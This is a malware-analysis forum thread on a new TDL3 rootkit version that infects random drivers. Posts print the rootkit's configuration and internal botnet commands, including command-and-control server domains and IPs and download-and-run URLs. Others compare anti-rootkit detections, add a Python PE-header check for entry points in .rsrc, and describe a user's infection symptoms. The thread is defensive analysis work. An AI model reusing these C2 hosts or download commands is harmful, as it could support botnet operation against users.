A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #618  by EP_X0FF
 Sat Apr 10, 2010 2:42 am
This is new version of TDL3. It is now infecting random drivers at drop time.
[main]
quote=I felt like putting a bullet between the eyes of every panda that wouldn't screw to save it's species. I wanted to open the dump valves on oil tankers and smother all those french beaches I'd never see. I wanted to breathe smoke
version=3.273
installdate=10.4.2010 2:40:36
builddate=6.4.2010 9:53:18
[injector]
*=tdlcmd.dll
[tdlcmd]
servers=https://zz87jhfda88.com/;https://91.212 ... n4cx00.cc/
wspservers=http://30xc1cjh91.com/;http://j00k877x. ... 3kjf7.com/
popupservers=http://clkh71yhks66.com/
version=3.741
delay=7200
clkservers=http://mfdclk001.org/
[tasks]
tdlcmd.dll=hxxps://112.121.181.26/rDbtafVZlDjA
 #619  by EP_X0FF
 Sat Apr 10, 2010 3:07 am
gjf wrote:And it will work if the rootkit doesn't check its registry settings. So this solution will be completely destroyed in several lines of code by the rootkit author :)
This is a cat-and-mouse game :) A little addition in the loader blinded all these removers.

some fun from the inside ;)
botnetcmd.SetCmdDelay(14400).
botnetcmd.FileDownloadRandom('https://zz87jhfda88.com/7sQnjvEo1qS0h12 ... botnet.dat').
tdlcmd.Download('https://91.212.226.66/4MwsS9PAz2x+','tdlcmd.dll').
tdlcmd.ConfigWrite('tdlcmd','delay','7200').
tdlcmd.ConfigWrite('tdlcmd','servers','https://zz87jhfda88.com/;https://19js81 ... n4cx00.cc/').
tdlcmd.ConfigWrite('tdlcmd','wspservers','http://30xc1cjh91.com/;http://j00k877x. ... 3kjf7.com/').
tdlcmd.ConfigWrite('tdlcmd','popupservers','http://clkh71yhks66.com/').
tdlcmd.ConfigWrite('tdlcmd','clkservers','http://z0g7ya1i0.com/').
\\?\globalroot\xkcxvrtm\tbcbopin\keywords
 #625  by InsaneKaos
 Sat Apr 10, 2010 2:23 pm
The trick with the registry key change won't work, TDL will set it back. If you have no clean copy of a driver, you can use the driver from System32\Drivers, because TDL will copy the clean driver, even if it is infected. Remember, TDL won't let you know that the driver is infected while it is active; the clean copy or a part of it is saved to the last sectors and TDL will point at this clean driver if a program asks for information. Just copy the driver to C:\ or wherever you want to get a clean copy.

Greetings, Kaos
 #627  by EP_X0FF
 Sat Apr 10, 2010 2:43 pm
InsaneKaos wrote:The trick with the registrykey change won't work, TDL will set it back.
I've tried all the new samples posted here. They don't care about the registry as far as I see. However, as gjf said, it is a question of a small driver fix in any new rootkit update.
 #632  by Blitskrieg
 Sat Apr 10, 2010 6:59 pm
EP_X0FF wrote:
InsaneKaos wrote:The trick with the registrykey change won't work, TDL will set it back.
I've tried all the new samples posted here. They don't care about the registry as far as I see. However, as gjf said, it is a question of a small driver fix in any new rootkit update.
Now TDL changes ImagePath on shutdown.
 #634  by gjf
 Sun Apr 11, 2010 12:16 am
I have performed a test of different antirootkits on the new sample. Files were not scanned, for VBA32 Antirootkit the driver was not installed, and RkU was the newest available. Kernel Detective 1.3.1 and RootRepeal were used too but gave nothing.

So logs are attached.

Who is the best:
1. Gmer - sees "entry point in ".rsrc" section" and "suspicious modification".
2. RkU (last beta) - "Virus alike driver modification".
3. VBA32 Antirootkit - "forged file".

So only these three can find the patched driver. All the others suck.
Attachments: Logs of scanning (31.34 KiB)
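The first heuristic in the list above, Gmer's "entry point in .rsrc section", can be checked offline on a copy of a driver pulled off disk. The following is an added example, not code from the thread or from any of the tools named in it: it walks the PE headers by hand, finds the section that contains AddressOfEntryPoint, and flags an entry point that lands in .rsrc or in a section without the executable characteristic. The two sample images are constructed header-only PE32 blobs built by a hypothetical build_pe helper, not real drivers.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000  # section is executable


def entry_point_section(pe: bytes):
    """Return (name, characteristics) of the section containing AddressOfEntryPoint."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                      # IMAGE_FILE_HEADER starts after the signature
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    entry_rva = struct.unpack_from("<I", pe, coff + 20 + 16)[0]
    first_section = coff + 20 + opt_size     # section table follows the optional header
    for i in range(nsections):
        fields = struct.unpack_from("<8sIIIIIIHHI", pe, first_section + 40 * i)
        name, vsize, vaddr, chars = fields[0], fields[1], fields[2], fields[9]
        if vaddr <= entry_rva < vaddr + vsize:
            return name.rstrip(b"\0").decode("ascii", "replace"), chars
    return None, 0                           # entry point outside every section


def is_entry_point_suspicious(pe: bytes) -> bool:
    """Gmer-style heuristic: entry point in .rsrc, or in a non-executable section."""
    name, chars = entry_point_section(pe)
    return name == ".rsrc" or not (chars & IMAGE_SCN_MEM_EXECUTE)


def build_pe(sections, entry_rva):
    """Constructed PE32 header-only image for the demo (hypothetical helper, not a real driver)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)    # e_lfanew -> PE signature right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)                     # PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)    # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)
    hdrs = b"".join(
        struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), vsize, vaddr, vsize, 0, 0, 0, 0, 0, chars)
        for name, vaddr, vsize, chars in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs


# Constructed samples: .text is code + executable, .rsrc is read-only initialized data.
SECTIONS = [(b".text", 0x1000, 0x800, 0x60000020), (b".rsrc", 0x2000, 0x400, 0x40000040)]
CLEAN_DRIVER = build_pe(SECTIONS, 0x1010)    # entry point inside .text
PATCHED_DRIVER = build_pe(SECTIONS, 0x2010)  # entry point redirected into .rsrc
```

Reading the file through the infected system may return the forged clean copy, as InsaneKaos notes above, so run the check on a copy taken from offline media or another host to get a meaningful result.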
 #656  by darseq
 Sun Apr 11, 2010 2:39 pm
Hi all. I got infected with tdl3 on the 6th of April and just wanted to share some of the symptoms.

- ipnat.sys could not be loaded anymore, causing Windows Firewall to fail. sc query ipnat returned error code 2, could not find the file specified, but navigating to windows\system32\ipnat.sys showed it was still there.

- Control panel | Administrative tools | Computer management | Disk management did not show my hard drive anymore.

- Hibernation failed: ftdisk event 45, The system could not successfully load the crash dump driver.

After two days of research I found tdl3 to be the problem. Gmer detected atapi.sys as suspicious, nothing further though. TDSSkiller detected atapi.sys to be infected but could not fix it. tdss remover (esage) found tcpip.sys to be infected, which it could successfully restore. After this all was cleaned (atapi.sys not suspicious anymore). The only remaining trace I could find was a file KGyGaAvL.sys with hidden and system flags set. I am not really sure if it is part of tdl3, but its contents seem to be encrypted (I attached it in case someone is interested, password is virus). I could not find any file called tdlcmd.dll, but maybe tdss remover deleted it.

I still have a question. Exactly what does tdl3 do once infected? How badly has my system been compromised? Should I be changing all my passwords?
Attachments: this file was found in windows\system32 (2.11 KiB)